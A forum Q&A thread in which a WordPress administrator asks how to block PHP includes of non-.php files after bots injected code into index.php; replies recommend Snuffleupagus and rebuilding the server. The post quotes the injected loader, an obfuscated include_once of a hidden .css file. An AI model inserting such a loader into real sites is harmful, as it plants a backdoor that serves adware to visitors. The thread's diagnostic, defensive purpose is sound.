Prevent or blacklist PHP include() to access any file that's not .php
So I manage a lot of Wordpress sites, recently a plugin that I have not detected yet has allowed some bots to break in and edit my index.php to include a file, which in turn redirects to some adware stuff.
An infected site looks like this:
<?php
/*bc973*/

$rz = "/var/www/myurl.com/htdocs/wp\x2dincl\x75des/blocks/spacer/.44f440d7.css"; if (!empty($rz)){ @include_once /* 14jxe */ ($rz); }

/*bc973*/

define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

(Note the line about include_once)
Additional info:
I am using fail2ban for IP blacklists and my stack is php-fpm with nginx
Is there any way to blacklist all includes not directed to another php file?
Thanks
EDIT
Guys, the server will be killed with fire in two weeks, I'm aware it's compromised however all my WP sites are up to date and with a very basic setup. I am asking this as an extra hardening layer, if possible.

What's keeping someone from putting a .php file anywhere they managed to put a .css file?

So someone is editing file ABC, and you are worried about them including XYZ? I'd be more concerned about ABC. Are your sites locked down so that a site's user cannot escape at least?

Back in the day there was Suhosin which I guess is now call Snuffleupagus, and that has such a feature I think. https://snuffleupagus.readthedocs.io/features.html#arbitrary-file-inclusion-hardening. This won't stop the initial problem, however.

How do I deal with a compromised server? - you seem to be trying to restrict the infection instead of curing it and preventing it from re-occuring. Not really sure why you're expending effort on that. You need to tackle the root cause of this.
